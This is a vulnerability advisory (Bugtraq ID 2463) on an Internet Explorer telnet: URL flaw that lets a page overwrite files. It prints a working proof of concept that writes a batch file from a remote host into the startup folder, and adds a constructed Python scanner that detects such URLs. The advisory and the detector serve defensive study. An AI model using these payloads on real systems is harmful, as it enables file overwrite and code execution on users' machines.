Microsoft IE Telnet Client File Overwrite Vulnerability
BID:2463
Info
| Bugtraq ID: | 2463 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 09 2001 12:00AM |
| Updated: | Mar 09 2001 12:00AM |
| Credit: | Discovered by Oliver Friedrichs <[email protected]> and posted to Bugtraq on March 13, 2001. Posted in a Microsoft Security Bulletin (MS01-015) on March 6, 2001. Microsoft released Microsoft Security Bulletin MS01-051 on October 10, 2001 stating the eff |
| Vulnerable: | Microsoft Internet Explorer 5.0.1 SP2, Microsoft Internet Explorer 5.0.1 SP1, Microsoft Internet Explorer 5.0.1, Microsoft Internet Explorer 6.0, Microsoft Internet Explorer 5.5 SP2, Microsoft Internet Explorer 5.5 SP1, Microsoft Internet Explorer 5.5 |
| Not Vulnerable: | |
Exploit / POC
The following exploit has been provided by Oliver Friedrichs <[email protected]>:
The following URL will cause IE to connect to the host and initiate the logging function:
telnet:-f%20\file.txt%20host
The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged in user has the appropriate permissions, a batch file will be created and executed upon future authentication.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
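A mail or proxy content filter can screen for this URL form before it reaches the browser. The following is an added example, not code from the advisory or from Microsoft; the function names, the attribute list and the sample markup are constructed for illustration. The check is a heuristic: it flags any telnet: URL whose decoded body contains a whitespace-separated token starting with "-".

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes that commonly carry URLs (assumed list, extend as needed).
URL_ATTRS = {"src", "href", "action", "background"}


def telnet_option_tokens(url):
    """Return option-like tokens ('-f', ...) found in a telnet: URL, else []."""
    decoded = unquote(url.strip())
    scheme, sep, rest = decoded.partition(":")
    if not sep or scheme.lower() != "telnet":
        return []
    # A well-formed telnet URL is telnet://host[:port]/ ; a body that decodes
    # to several words is being handed to the client as a command line.
    if rest.startswith("//"):
        rest = rest[2:]
    return [tok for tok in rest.split() if tok.startswith("-")]


class TelnetUrlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, raw url, option tokens)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                opts = telnet_option_tokens(value)
                if opts:
                    self.findings.append((tag, name, value, opts))


def scan_html(html):
    scanner = TelnetUrlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: one frame uses the short URL form quoted in the advisory,
# the link is an ordinary telnet URL with no options.
SAMPLE = """<html><frameset rows="100%,*">
<frame src="about:blank">
<frame src="telnet:-f%20\\file.txt%20host">
</frameset>
<a href="telnet://host.example:23/">console</a></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```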
Solution / Fix
Solution:
Microsoft has released a patch which rectifies this issue. It should be noted that in order to apply the patches for IE5.01 and IE5.5, you must have Internet Explorer Service Pack 2 installed for each product.
Microsoft Internet Explorer 5.5 SP2
- Microsoft Q306121
http://download.microsoft.com/download/ie55sp2/secpac20/5.5_SP2/WIN98Me/EN-US/q306121.exe
Microsoft Internet Explorer 6.0
- Microsoft Q306121
http://download.microsoft.com/download/IE60/Secpac20/6/W98NT42KMeXP/EN-US/q306121.exe
Microsoft Internet Explorer 5.0.1 SP2
References
References:
- Microsoft Security Bulletin (MS01-015) (Microsoft)
- Microsoft Security Bulletin MS01-051 (Microsoft)